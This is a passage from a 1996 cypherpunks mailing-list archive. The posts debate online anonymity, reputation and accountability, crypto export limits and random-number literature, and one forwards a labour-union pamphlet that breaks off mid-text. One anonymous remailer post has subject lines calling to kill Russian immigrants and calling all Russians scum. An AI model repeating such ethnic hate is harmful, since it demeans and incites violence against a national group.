
"A Positive Account of Property Rights," Social Philosophy and Policy 11
No. 2 (Summer 1994) pp. 1-16.

It can be found from the academic part of my web page:

http://www.best.com/~ddfr/Academic/Academic.html

David Friedman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 12:33:13 +0800
To: cypherpunks@toad.com
Subject: EDyson CPF 95 item
Message-ID: <199609040140.SAA07236@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


If anyone does did that up, please bounce one my way, so I can add it to 
the archives. Any other good stuff from that CFP would be of value too. 
Ditto for CFP96. I think the newest CFP transcripts we have are 94.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 4 Sep 1996 05:26:23 +0800
To: cypherpunks@toad.com
Subject: KILL ALL RUSSIAN IMIGRANTS
Message-ID: <199609031704.TAA02114@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Return-Path: <cypherpunks-errors@toad.com>
To: cypherpunks@toad.com
Subject: Kill all "libertarians"
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 02 Sep 96 15:48:31 EDT
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

>From nobody@REPLAY.COM  Mon Sep  2 12:26:36 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Mon, 02 Sep 96 15:42:57 EDT
	for dlv
Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA18013 for dlv@bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400
Received: (from replay@localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv@bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Message-Id: <199609021626.SAA11752@basement.replay.com>
To: dlv@bwalk.dm.com
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
Xcomm: Replay may or may not approve of the content of this posting
Xcomm: Report misuse of this automated service to <abuse@REPLAY.COM>
Subject: All russians are scum. No exceptions.

Return-Path: <cypherpunks-errors@toad.com>
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: Dole/Kemp '96!
Date: Mon, 02 Sep 96 01:19:37 EDT
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

jonathon <grafolog@netcom.com> writes:

> On Sun, 1 Sep 1996, James A. Donald wrote:
>
> > > I agree with what you are saying but not all polititions are that bad.
> > > You make it sound as if their are no politisions are for freedom of the
> > > net.
> > So who is the exception?
>
> 	Harry Browne  Libertarian Party Candidate.

Harry Browne is a fucking statist.  All politicians are scum.  No exceptions.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 4 Sep 1996 05:44:55 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: [NOISE] The Doors
Message-ID: <199609031936.TAA00607@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



The Doors was not only about freedom and love, but about crypto too!
Notice these lines from the song "Five to One"

Old [cipher] gets old and young get stronger
May take a week baby, may take longer [to crack]
they've [clinton] got the guns and we've got the numbers
gonna win we will take 'em over, com'on.

:)

- Vipul

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2247802                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 13:46:48 +0800
To: cypherpunks@toad.com
Subject: Anonymity (re: the Esther Dyson issue)
Message-ID: <ae52392e0302100467ce@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



The latest debate about "anonymity" and its hazards is bringing up charges
that we Cypherpunks are not taking Esther Dysomn's concerns seriously
enough.

I strongly disagree. The various downsides of anonymity,
pseudonymity/pseudoanonymity, lack of accountability, etc., have been
hashed out in literally *thousands* of posts over the past four years! Many
of us have written long articles dealing with these issues, and referring
in great detail to mechanisms for dealing with "obnoxious speech,"
"defamatory speech," "anonymous mailbombs," "anonymous threats," etc.

Rather than dredge up my own articles, or those of the many others who have
addressed most or all of the concerns most often raised, I'll post here one
of the subsections from my Cyphernomicon. This is just one of the
subsections in the entire _chapter_ devoted to issues of anonymity, mixes,
and remailers.

(For those not familiar with the style of my Cyphernomicon, I used a
powerful outline processor (MORE) to build a skeleton, attach threads and
ideas, move things around, clone headings in more than one place, etc. For
a large writing project of this sort, an outline processor is almost a
necessity. At least for me. The points are often short and are sometimes
incomplete; fleshing the whole thing out into well-written expository prose
would've taken an additional several months of full-time effort. This form
gets the points across.)

(A few subsubsections are deleted, to save space.)


Cyphernomicon 8.3

Anonymity, Digital Mixes, and Remailers:
Anonymity and Digital Pseudonyms

    8.3.1. Why is anonymity so important?
           - It allows escape from past, an often-essential element of
              straighening out (an important function of the Western
              frontier, the French Foreign Legion, etc., and something we
              are losing as the dossiers travel with us wherever we go)
           - It allows new and diverse types of opinions, as noted below
           - More basically, anonymity is important because identity is
              not as important as has been made out in our dossier
              society. To wit, if Alice wishes to remain anonymous or
              pseudonymous to Bob, Bob cannot "demand" that she provide
              here "real" name. It's a matter of negotiation between
              them. (Identity is not free...it is a credential like any
              other and cannot be demanded, only negotiated.)
           - Voting, reading habits, personal behavior...all are
              examples where privacy (= anonymity, effectively) are
              critical. The next section gives a long list of reasons for
              anonymity.
    8.3.2. What's the difference between anonymity and pseudonymity?
           + Not much, at one level...we often use the term "digital
              pseudonym" in a strong sense, in which the actual identity
              cannot be deduced easily
             - this is "anonymity" in a certain sense
           - But at another level, a pseudonym carries reputations,
              credentials, etc., and is _not_ "anonymous"
           - people use pseudonyms sometimes for whimsical reasons
              (e.g., "From spaceman.spiff@calvin.hobbes.org   Sep 6, 94
              06:10:30"), sometimes to keep different mailing lists
              separate (different personnas for different groups), etc.
    8.3.3. Downsides of anonymity
           - libel and other similar dangers to reputations
           + hit-and-runs actions (mostly on the Net)
             + on the other hand, such rantings can be ignored (KILL
                file)
               - positive reputations
           - accountability based on physical threats and tracking is
              lost
           + Practical issue. On the Cypherpunks list, I often take
              "anonymous" messages less seriously.
             - They're often more bizarre and inflammatory than ordinary
                posts, perhaps for good reason, and they're certainly
                harder to take seriously and respond to. This is to be
                expected. (I should note that some pseudonyms, such as
                Black Unicorn and Pr0duct Cypher, have established
                reputable digital personnas and are well worth replying
                to.)
           - repudiation of debts and obligations
           + infantile flames and run-amok postings
             - racism, sexism, etc.
             - like "Rumormonger" at Apple?
           - but these are reasons for pseudonym to be used, where the
              reputation of a pseudonym is important
           + Crimes...murders, bribery, etc.
             - These are dealt with in more detail in the section on
                crypto anarchy, as this is a major concern (anonymous
                markets for such services)
    8.3.4. "How will privacy and anonymity be attacked?"
           - the downsides just listed are often cited as a reason we
              can't have "anonymity"
           - like so many other "computer hacker" items, as a tool for
              the "Four Horsemen": drug-dealers, money-launderers,
              terrorists, and pedophiles.
           - as a haven for illegal practices, e.g., espionage, weapons
              trading, illegal markets, etc.
           + tax evasion ("We can't tax it if we can't see it.")
             - same system that makes the IRS a "silent partner" in
                business transactions and that gives the IRS access to--
                and requires--business records
           + "discrimination"
             - that it enables discrimination (this _used_ to be OK)
             - exclusionary communities, old boy networks
    8.3.5. "How will random accusations and wild rumors be controlled in
            anonymous forums?"
           - First off, random accusations and hearsay statements are
              the norm in modern life; gossip, tabloids, rumors, etc. We
              don't worry obsessively about what to do to stop all such
              hearsay and even false comments. (A disturbing trend has
              been the tendency to sue, or threaten suits. And
              increasingly the attitude is that one can express
              _opinions_, but not make statements "unless they can be
              proved." That's not what free speech is all about!)
           - Second, reputations matter. We base our trust in statements
              on a variety of things, including: past history, what
              others say about veracity, external facts in our
              possession, and motives.
    8.3.6. "What are the legal views on anonymity?"
           + Reports that Supreme Court struck down a Southern law
              requiring pamphlet distributors to identify themselves. 9I
              don't have a cite on this.)
             - However, Greg Broiles provided this quote, from _Talley
                v. State of California_, 362 U.S. 60, 64-65, 80 S.Ct.
                536, 538-539 (1960) : "Anonymous pamphlets, leaflets,
                brochures and even books have played an important role in
                the progress of mankind. Persecuted groups and sects from
                time to time throughout history have been able to
                criticize oppressive practices and laws either
                anonymously or not at all."

                Greg adds: "It later says "Even the Federalist Papers,
                written in favor of the adoption of our Constitution,
                were published under fictitious names. It is plain that
                anonymity has sometimes been assumed for the most
                constructive purposes." [Greg Broiles, 1994-04-12]

           + And certainly many writers, journalists, and others use
              pseudonyms, and have faced no legal action.
             - Provided they don't use it to evade taxes, evade legal
                judgments, commit fraud, etc.
           - I have heard (no cites) that "going masked for the purpose
              of going masked" is illegal in many jurisdictions. Hard to
              believe, as many other disguises are just as effective and
              are presumably not outlawed (wigs, mustaches, makeup,
              etc.). I assume the law has to do with people wearning ski
              masks and such in "inappropriate" places. Bad law, if real.
    8.3.7. Some Other Uses for Anonymous Systems:
           + Groupware and Anonymous Brainstorming and Voting
             - systems based on Lotus Notes and designed to encourage
                wild ideas, comments from the shy or overly polite, etc.
             - these systems could initially start in meeting and then
                be extended to remote sites, and eventually to nationwide
                and international forums
             - the NSA may have a heart attack over these trends...
           + "Democracy Wall" for encrypted messages
             - possibly using time-delayed keys (where even the public
                key, for reading the plaintext, is not distributed for
                some time)
             - under the cover of an electronic newspaper, with all of
                the constitutional protections that entails: letters to
                the editor can be anonymous, ads need not be screened for
                validity, advertising claims are not the responsibility
                of the paper, etc.
           + Anonymous reviews and hypertext (for new types of journals)
             + the advantages
               - honesty
               -  increased "temperature" of discourse
             + disadvantages
               - increased flames
               - intentional misinformation
           + Store-and-forward nodes
             - used to facillitate the anonymous voting and anonymous
                inquiry (or reading) systems
             - Chaum's "mix"
             + telephone forwarding systems, using digital money to pay
                for the service
               - and TRMs?
 ...

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 4 Sep 1996 13:27:56 +0800
To: Surya Koneru <surya@premenos.com>
Subject: Re: rc2 export limits..
Message-ID: <199609040252.TAA11495@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 9/3/96 -0700, you wrote:
>Hi,  Does anyone know the export limit for RC2 Key size ?  

As with any other crypto system, the rule is "you need to
get the NSA's permission, which they'll give if they feel like",
rather than any well-defined rule you can depend on.
However, the usual guidelines for systems like RC2 and RC4 is
40-bit keys, and RSA keys up to 512 bits for encrypting 
session keys and 1024 bits for signatures, plus you have to
structure the code so people can't easily modify it or
use it to triple-encrypt in ways that make the triple-encrypted
version stronger than 40 bits.

Also, if you're using Real RC2, you may need permission from
RSA Data Systems, Inc..  If you're just using the algorithm that
came out on the net that looks suspiciously like RC2, you may or may not.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 13:35:40 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <ae523d230402100455b9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:56 AM 9/4/96, jim bell wrote:
>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:

>>Not necessarily. The character of the anonymous speech is decisive. If you
>>use anonymity to cloak harassment, for instance, the anonymity (which
>>removes accountability) is a problem.  The accountability issue is real and
>>should be addressed, not evaded.
>
>"Addressed", maybe, but that doesn't necessarily mean, "solved."  For many
>decades, people have been able to walk up to a pay telephone at 3:00 AM and
>make a harassing phone call to somebody, a "problem" which still exists and
>no solution is being implemented for.
>
>I think it's reasonable to come to the conclusion that there is no solution
>to the anonymity "problem" that isn't worse than the underlying anonymity.
>And, BTW, I don't consider a pro-anonymity position to be an extremist one.

I agree, of course. There is absolutely nothing about "speech" that is tied
to "accountability." And various Supreme Court decisions have emphasized
this. (Pay special attention to the quote from Greg Broiles I included in
my section from my Cyphernomicon I just posted to the list.)

Think about it. Anyone may say pretty much anything they wish (modulo the
usual exceptions of certain forms of obscenity, shouting "Fire!,"
etc....and even these are enforced ex post facto). Once a speech act occurs
and some criminal prosecution results, the cops can try to catch the
speaker. But if they can't, they can't. We don't require that speech only
be done in a way that illegal speakers may be held "accountable."

The fact that certain classes of speakers are indeed held accountable is
more a function of the particular details of the way they spoke and the
nature of society than it is that there is a rule that "all speech must
involve accountability." We hold the author of an article in "The
Washington Post" more liable for insulting speech than we do the guy in the
neighborhood gym, even if they both say the same words. The issue is
clearly not that "all speech must involve accountability," as many forms of
speech are not.

(I'd say the meta-issue is "You can drag someone into court if you can
catch them. But if you can't catch them, you can't. And we're not going to
limit speech just to make it easier to catch speakers you may wish to haul
into court.")

As Jim and so many others have noted, anonymous phone calls, anonymous
postal mail, whispering campaigns, speech in private homes, etc., are all
examples where accountability is extremely difficult or impossible to
enforce. We even have names for these things: anonymous threats, poison pen
letters, ransom demands, gossip, etc.

Saying that speech on the Net may need to be restricted so as to ensure
"accountability" is a serious step in the direction of requiring
credentialling of all speakers, key escrow, and limits on remailers. Given
that so many other types of speech are given anonymity protection, why?

The reason this is such a hot button for Cypherpunks is that "responsible
freedom" and "accountability" are often code words for controlling some
very basic freedoms. Placing limits on anonymous speech would involve some
very fundamental restrictions on freedoms of various sorts. Even if
"safeguards" are built-in, the effect would almost certainly be to
illegalize remailers (unless they had "escrow" features!). And a wide array
of other freedoms, too numerous for me to write about here.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 4 Sep 1996 13:53:21 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
In-Reply-To: <R98oTD1w165w@bwalk.dm.com>
Message-ID: <199609040316.UAA27856@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

 > Indeed, I support the elimination of concepts such as
 > "slander" and "libel" precisely because they cause more harm
 > than good.  Currently, there is an illusion among ordinary
 > citizens that "if that was untrue, you could sue him for
 > libel!" despite the fact that this is rarely practical.  In
 > that way, the law actually adds credibility to what should
 > be an incredible claim. Eliminate libel suits, and you've
 > eliminated any presumption that because it's been spoken or
 > is in print, it's likely to be correct.

Reputation performs this function very well, and without
expensive litigation. That is why there is really no clear and
present danger posed by inacurate information on the Net.

Governments shield themselves far better by promoting conspiracy
theory as a recreational activity than they ever could by
prosecuting people who expose their activities.  Drowning signal
in noise effectively obscures it without lending credence to
material one cannot easily debunk.

As they say on X-Files, "The Truth is Out There..." (Somewhere)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winsock@c2.net (WinSock Remailer)
Date: Wed, 4 Sep 1996 11:45:10 +0800
To: cypherpunks@toad.com
Subject: Re: Pseudocrypto detector is going wild
Message-ID: <199609040024.RAA14142@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



Is it just me, or is the snake-oil frequency factor scaling up?
We used to get this stuff quarterly, and now it's monthly, if
not weekly!

slither-squeek

I think enquirer must be overloaded with ammo, and I am
sure in the mood for it now.
me













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 14:11:52 +0800
To: cypherpunks@toad.com
Subject: Reputations
Message-ID: <ae5246a405021004916e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Something closely related to anonymity issues is _reputation_.

As I keep saying, there have been dozens of articles on this and similar
topics. Mostly in the early days, when we were exploring such things (well,
some of us has started exploring them some years earlier...). Regrettably,
the archive system is not very functional, especially not for older
articles (there are rumors that L. Todd Masco took down the archive site
due to pressure from the "Wall Street Journal" over their copyrighted
articles in the archives...those Web spiders find all such copyright
violations!).

Here's another fragment of my Cyphernomicon, making some points about
positive reputations.

Briefly, think of "restaurants" when thinking about reputations. If one
arrives in a new city, most restaurants may have the same baseline
reputation, e.g. "none." A few may be known by name, for their
"reputation," either good ("You have to eat at Louie's--the laser chicken
is incredible") or bad ("Blecch!). Positive reputations and negative
reputations are self-explanatory. And the reputations of others may affect
the reputations of restaurants ("John Gilmore says he likes the Burma
Burger on Castro Street."). Bad recommendations may affect the "reputation
capital" of John, for example. (We speak of "reputation capital" because it
can in some sense be "spent.")

And so on. Many of the debates about anonymity seem to ignore reputations,
filters, kill files. It is almost as if the critics of anonymous speech are
saying "If there is not accountability for restaurant recommendations,
we'll all be buried in garbage food." This ignores the _emergent order_ or
_evolutionary_ nature of actors in the restaurant and restaurant evaluator
market.

Free speech is often messy. 98% of everything I read or hear is crap, to do
Sturgeon one better. But I use judgement to decide what to read, who to
listen to, and what to mostly ignore. I use _reputation_ to choose
restaurants, books, movies, speakers to listen to, etc.

Sometimes I listen to anonymous speech, but mostly I don't. Pseudonyms take
a while to gather a "positive reputation," and some never do. This is the
way speech works. "Accountability" is a red herring.

Anyway, here's the promised excerpt:


   15.5.5. reputations are what keep CA systems from degenerating into
            flamefests
           - digital pseudonyms mean a trail is left, kill files can be
              used, and people will take care about what they say
           - and the systems will not be truly anonymous: some people
              will see the same other people, allowing the development of
              histories and continued interactions (recall that in cases
              where no future interaction is exected, rudeness and
              flaming creeps in)
           + "Rumormonger" at Apple (and elsewhere) always degenerates
              into flames and crudities, says Johann Strandberg
             - but this is what reputations will partly offset
   15.5.6. "brilliant pennies" scam
   15.5.7. "reputation float" is how money can be pulled out of the
            future value of  a reputation
   15.5.8. Reputation-based systems and repeat business
           + reputations matter...this is the main basis of our economic
              system
             - repeat business....people stop doing business with those
                they don't trust, or who mistreat them, or those who just
                don't seem to be reputable
             - and even in centrally-controlled systems, reputations
                matter (can't force people to undertake some relations)
           - credit ratings (even for pseudonyms) matter
           - escrow agents, bonding, etc.
           - criminal systems still rely on reputations and even on
              honor
           - ironically, it is often in cases where there are
              restrictions on choice that the advantages of reputations
              are lost, as when the government bans discrimination,
              limits choice, or insists on determining who can do
              business with who
           + Repeat business is the most important aspect
             - granularity of transactions, cash flow, game-theoretic
                analysis of advantages of "defecting"
             - anytime a transaction has a value that is very large
                (compared to expected future profits from transactions,
                or on absolute basis), watch out
             - ideally, a series of smaller transactions are more
                conducive to fair trading...for example, if one gets a
                bad meal at a restaurant, one avoids that restaurant in
                the future, rather than suing (even though one can claim
                to have been "damaged")
             - issues of contract as well


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Wed, 4 Sep 1996 13:53:23 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Is Knuth's _AoCP_ still the authority on PRNG?
Message-ID: <01BB99D9.9A115240@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


check out
"On the Efficient Generation of Cryptographic Confusion and Diffusion Sequences"

I may have gotten the title less than perfect.  AltaVista will find it for you if you try.

Excellent piece.


----------
From: 	eli+@gs160.sp.cs.cmu.edu[SMTP:eli+@gs160.sp.cs.cmu.edu]
Sent: 	Tuesday, September 03, 1996 7:54 PM
To: 	coderpunks@toad.com
Subject: 	Re: Is Knuth's _AoCP_ still the authority on PRNG?

Bryce writes:
>I'm reading Knuth chapter 3 on "random numbers".  Have there
>been any major advances since the publication of the second
>edition of _The Art of Computer Programming, Volume 2_ in 1981?

A much-referenced article:
Marsaglia, G. (1985). "A current view of random number generation".
In L. Billard (ed.), _Computer Science and Statistics: The Interface_.

A more recent survey, which I haven't read:
L'Ecuyer, P. (1990). "Random numbers for simulation".  CACM 87,
no. 10, 85-97.

I read the resulting _NYT_ blurb, but not the paper:
Ferrenberg et al. (1992). "Monte Carlo simulations: Hidden errors from
`good' random number generators".  Phys. Rev. Lett. 69, 3382-4.

This is from the "simulation" angle, which is where Knuth is coming
from.  For crypto you may be interested in the complexity-theoretic
approach (things like Blum-Blum-Shub), which is a whole different
field.

>Are any of the ideas advocated in chapter 3 now considered
>inadvisable?

I think the Marsaglia paper sank Knuth's recommended generator.
"Sank" is a relative term, of course.

--
   Eli Brandt
   eli+@cs.cmu.edu







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 14:13:42 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <ae524b9206021004b9ee@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 AM 9/4/96, Jon Lebkowsky wrote:

>The terms "responsibility" and "accountability" are misused, which is
>unfortunate, since I think we'd all argue in favor of taking responsibility
>for our speech/actions in a positive sense. The negative is in asking me to
>sacrifice my freedom because some few behave irresponsibly. This is like
>setting an illogical default, assuming that it's a preventive, but it
>prevents nothing.

Well, I've written a lot (or forwarded a lot) on various aspects of this issue.

Both terms are _overloaded_, probably to the point of not even being useful
terms for this debate. Everyone comes in to the debate with their notions
of what "responsible" speech is, what "accountability" entails, etc.

Having said this, and not knowing how your (or anyone else's) definitions
relate to mine, I simply don't agree that I have to take responsibility for
all of my speech/actions. I can think of many cases where I have elected to
use untraceable anonymity, as many others have, so those are direct
counterexamples to your point, thus disproving your "I think we'd all argue
in favor of taking responsibility" point.

(A vast number of other points worthy of discussion. I am happy to hear
from at least two EFF "insiders" that this issue is being discussed within
EFF as we speak. It's about time. Anonymity is a whole lot more than just
about "anonymous posts" from "Mr. Anonymous." The issue hits on issues of
True Names, speech licenses, escrow, legality of remailers, business vs.
personal speech, etc.)


>Getting beyond this discussion of EFF, has any global entity discussed
>making remailers illegal?
>

By "global entity" do you mean the U.N., or the Borg? The G7 issued a
typically vague statement about cracking down on terrorist
communications...this could be construed as the beginnings of an assault on
Cypherpunkish sorts of things. Too soon to tell.

The Church of Scientology (the same group which favorable quotes Esther
Dyson's concerns about anonymity and dangerous speech) has of course been
targetting remailers for a long time. Not in getting them outlawed, but in
getting them to to divulge names and logs. This has the effect of harassing
remailers, and causing some to discontinue them...probably a desired
effect. Julf's shutdown of Penet they probably are dancing a jig over (but
the last laugh will be when users transition to a world-wide, distributed,
robust network of Cypherpunks-style remailers).

Within the U.S. there are few ways remailers could be shut down, in terms
of legal action. The various Supreme Court cases have been discussed many
times.

I suspect the Digital Telephony Act could be invoked to demand that ISPs
make their systems wiretappable: then, if the presence of a remailer
defeats this wire-tappability, the ISP could force the remailer off.

(I'm not an expert, but I believe DT doesn't apply to computer bulletin
boards and ISPs, only to phone systems. But as Internet telephony spreads,
and any ISP may also be a de facto phone system, couldn't the language of
DT be extended to cover ISPs? This is something I worried about at the time
the EFF helped give us Digital Telephony.)

If legislation passes that makes carrying and producing identification
mandatory (and this could happen by either the immigration or
anti-terrorism route, or both), and if the Postal Service succeeds in
getting accepted their scheme to require positive identification of all
letter and package senders, then the same sorts of laws could be used to
require that all e-mail messages have a True Name attached.

Poof, there go the remailers.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 4 Sep 1996 16:09:25 +0800
To: Stanton McCandlish <mech@eff.org>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609040412.VAA13877@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:02 PM 9/3/96 -0700, Stanton McCandlish wrote:
>> But we do not want legislation, so we do not want to help write legislation.
>> 
>> We want to delay legislation for as long as possible, for the longer the
>> delay, the more the balance of power favors the net and disavors the pols.
>> 
>> Therefore the correct strategy is simply to attack any politician who shows
>> any interest in legislating on our issues.
>> 
>> We have no friends on Capitol hill, and if we did have friends, it would
>> still be necessary to denounce them as enemies.
>
>I agree with the general sentiment behind this, but I think it may go a 
>bit overboard. For example, it is worthwhile to support Pro-CODE and SAFE 
>(the two crypto bills now floating around in Congress). On the surface 
>they both appear to threaten the viability of the Bernstein, Karn and 
>Junger cases, but in reality neither of these bills have a chance in hell 
>of passage.  

Be careful, Leahy's bill sucked. I don't classify it as "pro-crypto" at all, 
although if you believed those organizations that initially supported it you'd 
come to that conclusion.  So somebody following your analysis (blindly) 
might have inadvertently embraced a clunker, concluding that supporting 
SOMETHING was important for the reasons you listed.  

And while this may appear to be paranoia, I suspected that that the whole 
reason for the Leahy bill was to get the "criminalization of the use of 
encryption" section on the books, the one truly awful part of the bill.  The 
funny thing is, it almost worked!  Didn't it, EFF?!?


 Burns' bill seems to be at least moderately acceptable, in that it appears 
to remove most restrictions on crypto export.  Further, I don't necessarily 
share your pessimism that these bills won't pass.  Not this year, of course, 
but possibly next year. 


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 4 Sep 1996 15:44:00 +0800
To: cypherpunks@toad.com
Subject: Workers of the Web, UNITE!
Message-ID: <v01510105ae5297085273@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Tired: Libertarian cypherpunks
Wired: Crypto-socialists

"Whether they be fast-food workers, word processors, or micro-chip
assemblers, today's non-union wage workers need the IWW's brand of
no-compromise unionism even more than their predecessors."

:)

-Declan



http://iww.org/tandv.html

> THE WOBBLIES:
>
> Tactics and Vision for a New Workers' Movement
>
> An Introduction to the Industrial Workers of the World (IWW)
>
> ISN'T THE IWW JUST FOR FACTORY WORKERS?
>
> Every worker is an "industrial" worker - whether they work in health
> care, tourism, education, or publishing. The relatively recent
> association between the word "industry" and heavy manufacturing is
> misleading, and was never intended to be by the founders of the IWW.
> If you earn your living by working with your hands or your mind,
> then you're welcome in the IWW. Only bosses (defined as those with
> direct power to hire and fire) are excluded from IWW membership.
>
> The Wobblies (as members of the IWW are known) have historically
> focused on helping organize those workers that the American
> Federation of Labor (AFL) shunned. In the early 1900s that meant
> African-Americans, immigrants, women, and unskilled laborers. Today
> that means curbside recyclers, non-profit staffers, temp workers,
> sex-industry workers, co-op employees -- in short, any worker in any
> workplace regardless of size or structure.
>
> CAN THE IWW HELP ME TO IMPROVE THE WAGES OR WORKING CONDITIONS AT MY
> CURRENT JOB?
>
> That largely depends on you. The IWW is a "do-it-yourself" union,
> and does not provide an all-knowing leadership or hefty treasury to
> fight your battles for you. But if you're willing to organize at
> your job-site by talking with your co-workers about the issues that
> matter to them, then you can count on your fellow workers in the IWW
> to lend their full support to your struggle.
>
> Individual workers can accomplish little by themselves, and are
> liable to be fired if they raise their voice in protest. But by
> joining together in a union such as the IWW, workers are far more
> powerful when confronting their boss about workplace injustices. Our
> union can provide tangible, community-based resources such as
> low-cost printing, speakers, legal advise, and how-to manuals, as
> well as bodies on a picket line. You won't get bureaucrats in suits
> and ties telling you how to run your strike, just friends lending a
> hand where they can.
>
> THE IWW AND MAINSTREAM LABOR
>
> For almost a century, the leadership of the AFL-CIO has worked hand
> in hand with the capitalists to squelch rank and file militancy.
> Their overriding concern has been "industrial harmony," not economic
> and social justice, and so they fail to question the most basic
> assumptions of capitalist production. While union bosses play golf
> with the titans of industry, real wages and safety conditions have
> continued to worsen these last thirty years or so.
>
> Regular AFL trade unions split workers up into their respective
> skills, allowing one craft union to cross the picket line of
> another. The IWW believes in "industrial unionism," organizing all
> workers in a given industry into the same union (thus our name). At
> a construction site, for instance, the carpenters should be able to
> count on the unswerving support of the plumbers, laborers,
